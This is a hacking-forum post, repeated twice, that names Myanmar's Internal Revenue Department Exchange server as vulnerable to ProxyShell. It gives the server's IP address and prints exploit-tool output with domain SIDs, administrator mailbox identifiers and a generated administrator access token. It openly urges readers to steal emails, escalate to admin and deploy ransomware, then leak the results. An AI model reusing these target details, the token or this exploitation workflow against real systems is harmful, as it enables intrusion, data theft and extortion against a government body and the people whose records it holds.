OP 08 April, 2022 - 07:22 PM
(This post was last modified: 08 April, 2022 - 07:32 PM by SherlockHemredge. Edited 2 times in total.)
Myanmar Internal Revenue Department! ird.gov.mm has been found to be vulnerable to proxyshell. With this you can gain remote access to their exchange server. From here it's up to you. Download their emails, elevate to admin and fire off some RAAS, it's up to you. Maybe your against the current military coup?
Once you pwn them you can shout out to emma best on twitter and see your hard work published on ddosecrets.com
It's important to note that a lot of RAAS groups have been exploiting proxyshell
POC: 136.228.161.122 (ird.gov.mm)
[+] Exchange Backend Servers: ['irdygnexch1.ird.local']
[+] irdygnexch1.ird.local - version: 15.1.2106.2
[+] irdygnexch1.ird.local - version_short: Exchange Server 2016 CU18
[+] irdygnexch1.ird.local - user: IRD\IRDYGNEXCH2$
[+] irdygnexch1.ird.local - sid: S-1-5-21-3856308590-1329614902-3196429431-1635
[+] Successfully parsed SID via backend request: S-1-5-21-3856308590-1329614902-3196429431-1635
[+] Attempting to retrieve Active Directory emails...
[+] Enumerated 0 possible UserMailbox LegacyDNs from Active Directory
[+] Enumerated 100 possible User LegacyDNs from Active Directory
[+] Enumerated SMTP domains: {'ird.gov.mm', 'local.'}
[+] Attempting to discover SID via 14 builtin email combinations
[+] Retrieved LegacyDN: /o=IRD/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=e3d8630c924d443a89337cf6ba7be198-Administrator
[+] Identified backend SMTP domain: ird.gov.mm
[+] Attempting to retrieve SID for /o=IRD/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=e3d8630c924d443a89337cf6ba7be198-Administrator
[+] Successfully parsed SID via UserMailbox object: S-1-5-21-3856308590-1329614902-3196429431-500
[+] Successfully parsed SID via MailContact: S-1-5-21-3856308590-1329614902-3196429431-1635
[+] Attempting to discover SID via 100 enumerated emails
[+] Retrieved LegacyDN: /o=IRD/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=c7375bca7c4c4c1fbaef802f4a102972-Admin
[+] Attempting to retrieve SID for /o=IRD/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=c7375bca7c4c4c1fbaef802f4a102972-Admin
[+] Successfully parsed SID via UserMailbox object: S-1-5-21-3856308590-1329614902-3196429431-1213
[+] Successfully parsed SID via MailContact: S-1-5-21-3856308590-1329614902-3196429431-1635
[+] RID Cycled: S-1-5-21-3856308590-1329614902-3196429431-500
[+] Generated token for [email protected] - S-1-5-21-3856308590-1329614902-3196429431-500
[+] Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBhBZG1pbmlzdHJhdG9yQGlyZC5nb3YubW1VLVMtMS01LTIxLTM4NTYzMDg1OTAtMTMyOTYxNDkwMi0zMTk2NDI5NDMxLTUwMEcBAAAABwAAAAxTLTEtNS0zMi01NDRFAAAAAA==
PS> Get-Mailbox (https://archive.ph/eOmiT)
https://ird.gov.mm/
Happy Hacking
Once you pwn them you can shout out to emma best on twitter and see your hard work published on ddosecrets.com
It's important to note that a lot of RAAS groups have been exploiting proxyshell
POC: 136.228.161.122 (ird.gov.mm)
[+] Exchange Backend Servers: ['irdygnexch1.ird.local']
[+] irdygnexch1.ird.local - version: 15.1.2106.2
[+] irdygnexch1.ird.local - version_short: Exchange Server 2016 CU18
[+] irdygnexch1.ird.local - user: IRD\IRDYGNEXCH2$
[+] irdygnexch1.ird.local - sid: S-1-5-21-3856308590-1329614902-3196429431-1635
[+] Successfully parsed SID via backend request: S-1-5-21-3856308590-1329614902-3196429431-1635
[+] Attempting to retrieve Active Directory emails...
[+] Enumerated 0 possible UserMailbox LegacyDNs from Active Directory
[+] Enumerated 100 possible User LegacyDNs from Active Directory
[+] Enumerated SMTP domains: {'ird.gov.mm', 'local.'}
[+] Attempting to discover SID via 14 builtin email combinations
[+] Retrieved LegacyDN: /o=IRD/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=e3d8630c924d443a89337cf6ba7be198-Administrator
[+] Identified backend SMTP domain: ird.gov.mm
[+] Attempting to retrieve SID for /o=IRD/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=e3d8630c924d443a89337cf6ba7be198-Administrator
[+] Successfully parsed SID via UserMailbox object: S-1-5-21-3856308590-1329614902-3196429431-500
[+] Successfully parsed SID via MailContact: S-1-5-21-3856308590-1329614902-3196429431-1635
[+] Attempting to discover SID via 100 enumerated emails
[+] Retrieved LegacyDN: /o=IRD/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=c7375bca7c4c4c1fbaef802f4a102972-Admin
[+] Attempting to retrieve SID for /o=IRD/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=c7375bca7c4c4c1fbaef802f4a102972-Admin
[+] Successfully parsed SID via UserMailbox object: S-1-5-21-3856308590-1329614902-3196429431-1213
[+] Successfully parsed SID via MailContact: S-1-5-21-3856308590-1329614902-3196429431-1635
[+] RID Cycled: S-1-5-21-3856308590-1329614902-3196429431-500
[+] Generated token for [email protected] - S-1-5-21-3856308590-1329614902-3196429431-500
[+] Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBhBZG1pbmlzdHJhdG9yQGlyZC5nb3YubW1VLVMtMS01LTIxLTM4NTYzMDg1OTAtMTMyOTYxNDkwMi0zMTk2NDI5NDMxLTUwMEcBAAAABwAAAAxTLTEtNS0zMi01NDRFAAAAAA==
PS> Get-Mailbox (https://archive.ph/eOmiT)
https://ird.gov.mm/
Happy Hacking